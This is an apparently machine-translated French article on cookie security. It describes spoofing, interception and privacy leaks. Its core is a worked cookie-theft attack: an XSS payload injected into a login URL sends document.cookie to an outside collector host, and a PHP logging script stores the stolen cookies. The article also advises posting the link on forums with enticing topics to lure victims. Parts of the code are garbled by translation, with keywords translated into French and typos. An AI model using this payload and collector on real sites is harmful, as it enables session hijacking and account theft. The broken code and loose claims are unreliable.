Analyse approfondie des problèmes de sécurité des cookies_cookies

Le but des cookies est d'apporter du confort aux utilisateurs et d'ajouter de la valeur au site Web. Dans des circonstances normales, ils ne constitueront pas de menaces sérieuses pour la sécurité. Les fichiers cookies ne peuvent pas être exécutés sous forme de code et ne peuvent pas transmettre de virus. Ils sont la propriété de l'utilisateur et ne peuvent être lus que par le serveur qui les a créés. De plus, les navigateurs n'autorisent généralement que le stockage de 300 cookies, et chaque site peut stocker jusqu'à 20 cookies. La taille de chaque cookie est limitée à 4 Ko. Les cookies ne rempliront donc pas le disque dur et ne seront pas utilisés comme tels. une attaque par « déni de service ».

Cependant, en remplacement de l'identité de l'utilisateur, la sécurité des cookies détermine parfois la sécurité de l'ensemble du système, et les problèmes de sécurité des cookies ne peuvent être ignorés.

(1) Usurpation de cookies Les cookies enregistrent des informations telles que les identifiants de compte utilisateur et les mots de passe, et sont généralement cryptés à l'aide de la méthode MD5 avant d'être transmis en ligne. Même si les informations cryptées sont interceptées par certaines personnes ayant des arrière-pensées sur Internet, elles ne peuvent pas être comprises. Cependant, le problème est maintenant que la personne qui intercepte le cookie n'a pas besoin de connaître la signification de ces chaînes. Tant qu'elle soumet les cookies d'autres personnes au serveur et peut passer la vérification, elle peut se faire passer pour la victime et se connecter. sur le site Web. Ce comportement est appelé triche des cookies.
Les utilisateurs illégaux obtiennent les clés de cryptage correspondantes grâce à la tromperie des cookies, accédant ainsi à toutes les informations personnalisées des utilisateurs légitimes, y compris les e-mails des utilisateurs et même les informations de compte, causant ainsi un préjudice grave aux informations personnelles.
(2) Interception des cookies
Les cookies sont transmis entre le navigateur et le serveur sous forme de texte brut et peuvent facilement être illégalement interceptés et utilisés par des tiers. Les cookies peuvent être lus par toute personne pouvant intercepter les communications Web.
Une fois qu'un cookie est intercepté par un utilisateur illégal puis réexécuté pendant sa période de validité, l'utilisateur illégal bénéficiera des droits d'un utilisateur légal. Par exemple, pour la lecture en ligne, les utilisateurs illégaux peuvent profiter de la lecture en ligne de magazines électroniques sans payer de frais.

Les méthodes d'interception des cookies sont les suivantes :

(1) Utiliser la programmation pour intercepter les cookies. La méthode est analysée ci-dessous. La méthode se déroule en deux étapes.

Étape 1 : Localisez le site Web qui doit collecter des cookies, analysez-le et construisez l'URL. Tout d'abord, ouvrez le site Web sur lequel vous souhaitez collecter les cookies, en supposant qu'il s'agit de http://www.XXX.net. Connectez-vous au site Web et saisissez le nom d'utilisateur "" (sans les guillemets). et capturez les paquets, et obtenez le code suivant :
http://www.XXX.net/tXl/login/login.pl? username=&passwd=&ok.X=28&ok.y=6;
Remplacez "" par :
"<script>alert(document.cookie)</script>" Réessayez si l'exécution réussit, commencez à construire l'URL :
. http://www.XXX.net/tXl/login/login.pl? username=<script>window.open ("http://www.cbifamily.org/cbi.php?"+document.cookie)</script>&passwd=&ok.X=28&ok.y=6.
Parmi eux, http://www.cbifamily.org/cbi.php est un script sur un certain hôte que l'utilisateur peut contrôler. Notez que "+" est l'encodage URL du symbole " ", puisque " " sera traité comme un espace. L'URL peut être publiée sur le forum pour inciter les autres à cliquer dessus.

Étape 2 : Préparez un script PHP qui collecte les cookies et placez-le sur un site Web que l'utilisateur peut contrôler. Lorsqu'une personne sans méfiance clique sur l'URL construite, le code PHP peut être exécuté. Le contenu spécifique du script est le suivant :

Copier le code Le code est le suivant :

$info=getenv("OUERY_STRING");
si（$info）｛
$fp=fopen("info.tXt","a");
fwrite($fp,!info."n");
fclose($fp);
｝
header("Emplacement :http://www.XXX.net");
?>

Mettez ce code sur le réseau et vous pourrez récupérer les cookies de tout le monde. Si un forum autorise le code HTML ou autorise l'utilisation de balises Flash, vous pouvez utiliser ces technologies pour collecter le code des cookies et le mettre dans le forum, puis donner au message un sujet attrayant et rédiger un contenu intéressant, et vous pouvez rapidement en collecter un grand nombre. de Cookies. Sur le forum, les mots de passe de nombreuses personnes ont été volés par cette méthode.
(2) Utilisez les dangers cachés du code Flash pour intercepter les cookies. Il existe une fonction getURL() dans Flash. Flash peut utiliser cette fonction pour ouvrir automatiquement une page Web spécifiée, ce qui peut diriger les utilisateurs vers un site Web contenant du code malveillant. Par exemple, lorsqu'un utilisateur profite d'une animation Flash sur un ordinateur, le code dans l'image d'animation peut avoir été discrètement connecté à Internet et ouvrir une très petite page contenant un code spécial. Cette page peut collecter des cookies et faire d'autres choses nuisibles. des choses. Les sites Web ne peuvent pas empêcher Flash de faire cela car il s'agit d'une fonction interne du fichier Flash.
(3) Les cookies fuient la confidentialité du réseau
La principale raison pour laquelle les cookies provoquent des fuites de confidentialité en ligne est la suivante : motivée par des intérêts commerciaux. Avec l'essor du commerce électronique et l'émergence d'énormes opportunités commerciales sur Internet, certains sites Web et institutions abusent des cookies et utilisent la technologie des moteurs de recherche, la technologie d'exploration de données et même la technologie de tromperie de réseau pour collecter des informations personnelles sur d'autres personnes sans l'autorisation du visiteur. afin de créer des bases de données d'utilisateurs, de publicité et à d'autres fins lucratives, entraînant une fuite de la vie privée des utilisateurs. "L'ouverture de la transmission des informations sur les cookies. Les fichiers cookies ont des processus de transmission et des caractéristiques de texte spéciaux. La transmission de fichiers Cookie-ie cryptés de manière non sécurisée entre le serveur et le client peut facilement entraîner une fuite d'informations personnelles.

Ce qui précède est ma compréhension personnelle de la sécurité des cookies. Veuillez me corriger s'il y a des omissions.